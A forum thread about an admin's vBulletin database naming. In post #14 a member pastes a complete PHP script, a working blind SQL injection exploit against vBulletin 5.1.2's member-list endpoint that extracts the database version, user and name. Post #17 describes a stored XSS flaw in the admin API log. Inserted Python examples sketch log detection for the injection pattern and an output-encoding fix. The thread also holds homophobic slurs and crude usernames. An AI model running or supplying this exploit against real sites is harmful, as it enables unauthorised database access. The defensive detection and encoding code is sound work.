
lanny why have you named your database table and username both VB

  1. #1
    Couldn't think of anything better?
  2. #2
    Sophie Pedophile Tech Support
    Maybe VB is the default account.
  3. #3
    Maybe VB is the default account.


    no such thing.
  4. #4
    Sophie Pedophile Tech Support
    no such thing.

    Alright then IDK why.
  5. #5
    Alright then IDK why.


    it's cause he got lazy and just named his db info vb
  6. #6
    Arnox Yung Blood
    It's the default.

  7. #7
    It's the default.



    shut up jake you gaping faggot.
  8. #8
    mmQ Lisa Turtle
    I agree with The Dragon.
  9. #9
    Michael Myers victim of incest [divide your nonresilient tucker]
    How do you even know he named it that? Are you a hax0r?
  10. #10
    How do you even know he named it that? Are you a hax0r?


    I haxed the database.
  11. #11
    arthur treacher African Astronaut
    I am disgusted by how you said 'gaping faggot'. I never thought of it like that, and now I hate life.

    -edit- I guess that is what goatse is. Why do you make me think of this stuff? fuck.
  12. #12
    Arnox Yung Blood
    shut up jake you gaping faggot.

    Who the heck is Jake? Maybe you could call me Big Jake though and I could wear a cowboy hat.
  13. #13
    Lanny Bird of Courage
    Couldn't think of anything better?


    I couldn't but then I'm not sure why it matters or what would be "better".

    I'm assuming you used that memberlist exploit? Should be patched now.
  14. #14
    -SpectraL coward [the spuriously bluish-lilac bushman]
    <?php

    /*
    Author: Nytro
    Powered by: Romanian Security Team
    Price: Free. Educational.
    */


    error_reporting(E_ALL);
    ini_set('display_errors', 1);


    // Get arguments


    $target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
    $expression = str_replace('/', '\\/', $target_url);


    // Function to send a POST request


    function httpPost($url,$params)
    {
    $ch = curl_init($url);


    curl_setopt($ch, CURLOPT_URL,$url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $params);

    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
    'Accept: application/json, text/javascript, */*; q=0.01',
    'X-Requested-With: XMLHttpRequest',
    'Referer: https://rstforums.com/v5/memberlist',
    'Accept-Language: en-US,en;q=0.5',
    'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
    ));


    $output = curl_exec($ch);

    if($output == FALSE) print htmlspecialchars(curl_error($ch));


    curl_close($ch);
    return $output;
    }


    // Function to get string between two other strings


    function get_string_between($string, $start, $end)
    {
    $string = " ".$string;
    $ini = strpos($string,$start);
    if ($ini == 0) return "";
    $ini += strlen($start);
    $len = strpos($string,$end,$ini) - $ini;
    return substr($string,$ini,$len);
    }


    // Get version


    print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n";
    print "Version: ";


    $result = httpPost($target_url . '/ajax/render/memberlist_items',
    'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1 ,1)--+"+' .
    '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


    $letter = 1;


    while(strpos($result, 'No Users Matched Your Query') == false)
    {
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];

    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
    'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version( ),' . $letter . ',1)--+"+' .
    '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
    }


    // Get user


    print "\r\nUser: ";


    $result = httpPost($target_url . '/ajax/render/memberlist_items',
    'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1 ,1)--+"+' .
    '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


    $letter = 1;


    while(strpos($result, 'No Users Matched Your Query') == false)
    {
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];


    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
    'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
    '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
    }


    // Get database


    print "\r\nDatabse: ";


    $result = httpPost($target_url . '/ajax/render/memberlist_items',
    'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), 1,1)--+"+' .
    '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


    $letter = 1;


    while(strpos($result, 'No Users Matched Your Query') == false)
    {
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];


    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
    'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), ' . $letter . ',1)--+"+' .
    '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
    }


    print "\r\n"


    ?>
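
    Added example, not part of the post above and not vBulletin code: a log check for the request pattern that script produces, i.e. POSTs to /ajax/render/memberlist_items whose criteria[startswith] value is not a plain prefix. The log line format, the sample addresses and the allowed-prefix rule are assumptions made for the illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qs

ENDPOINT = "/ajax/render/memberlist_items"
# Assumption: a member-list prefix filter only needs a short run of letters, digits or '#'.
SAFE_PREFIX = re.compile(r"[A-Za-z0-9#]{0,16}")
# SQL fragments that have no business in a prefix filter.
SQL_HINTS = re.compile(
    r"(?i)(\bor\b|\bunion\b|substr\s*\(|version\s*\(|user\s*\(|database\s*\(|--|['\"])"
)

# Constructed log lines in an assumed format: "<source> <method> <path> <urlencoded body>".
SAMPLE_LOG = """\
198.51.100.7 POST /ajax/render/memberlist_items criteria[perpage]=10&criteria[startswith]=a&securitytoken=guest
203.0.113.9 POST /ajax/render/memberlist_items criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1,1)--+"+&securitytoken=guest
203.0.113.9 POST /ajax/render/memberlist_items criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),2,1)--+"+&securitytoken=guest
198.51.100.7 GET /memberlist -
"""


def classify(line):
    """Return (source, hints); hints is empty when the request looks benign."""
    source, method, path, body = line.split(" ", 3)
    if method != "POST" or not path.endswith(ENDPOINT):
        return source, []
    params = parse_qs(body, keep_blank_values=True)
    value = params.get("criteria[startswith]", [""])[0].strip()
    if SAFE_PREFIX.fullmatch(value):
        return source, []
    hints = sorted({m.lower() for m in SQL_HINTS.findall(value)})
    return source, hints or ["not-a-prefix"]


def flagged_sources(log):
    """Count suspicious member-list requests per source address."""
    counts = Counter()
    for line in log.splitlines():
        if line.strip():
            source, hints = classify(line)
            if hints:
                counts[source] += 1
    return counts
```

    A source that accumulates many flagged requests in a short window, each differing only in one number, is the signature of the character-by-character loop in the script.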
  15. #15
    Sophie Pedophile Tech Support

    Lanny patched it already but i dig the script.
  16. #16
    Arnox Yung Blood
    I think it's pretty sad that Lanny has to do Internet Brands' job for them. They've had literally YEARS to patch this crap.
  17. #17
    Sophie Pedophile Tech Support
    I think it's pretty sad that Lanny has to do Internet Brands' job for them. They've had literally YEARS to patch this crap.

    I found more.

    Persistent XSS vulnerability.

    vBulletin 4/5 does not properly sanitize client-provided xmlrpc attributes (e.g. client name), allowing the remote xmlrpc client to inject code into the xmlrpc API logging page. Code is executed once an admin visits the API log page and clicks on the API client's name.

    Vulnerable component: ./admincp/apilog.php?do=viewclient
    apilog.php does not sanitize xmlrpc client-provided data before passing it to print_label_row to generate the output page.
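
    Added example, not part of the post above and not vBulletin code: the stored-XSS pattern it describes, modelled in Python with a row helper that stands in for print_label_row. It shows the unencoded render beside one that HTML-encodes at output, plus a triage pass over already-stored records. The field names and the sample records are hypothetical and constructed.

```python
import html
import re

# Constructed API-client records; every field was supplied by the remote client.
# Field names are hypothetical.
STORED_CLIENTS = [
    {"clientname": "MobileApp", "clientversion": "2.1", "platformname": "Android"},
    {"clientname": "<script>alert(1)</script>", "clientversion": "1.0", "platformname": "x"},
]

ROW = "<tr><td>%s</td><td>%s</td></tr>"


def label_row_unsafe(label, value):
    """Row helper that trusts the caller to have encoded the value already."""
    return ROW % (label, value)


def label_row(label, value):
    """Hardened helper: encode at the point of output, whatever the caller did."""
    return ROW % (html.escape(str(label)), html.escape(str(value), quote=True))


def render_client(record, row=label_row):
    """Render one client's detail page body, one table row per stored field."""
    return "\n".join(row(key, val) for key, val in record.items())


HTML_META = re.compile(r"[<>\"'&]")


def suspicious_records(records):
    """Triage: indexes of stored records with HTML metacharacters in any field."""
    return [
        i for i, rec in enumerate(records)
        if any(HTML_META.search(str(v)) for v in rec.values())
    ]
```

    Encoding at output also neutralises records that were stored before the fix, which is why the triage pass is for investigation rather than a substitute for the encoding.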
  18. #18
    Michael Myers victim of incest [divide your nonresilient tucker]
    I haxed the database.


    Oh shit!!! BRUH.
  19. #19
    AngryIVer African Astronaut [my jade controlled morrigan]
    I'm confused, did we used to run something other than half baked hand written BBS software?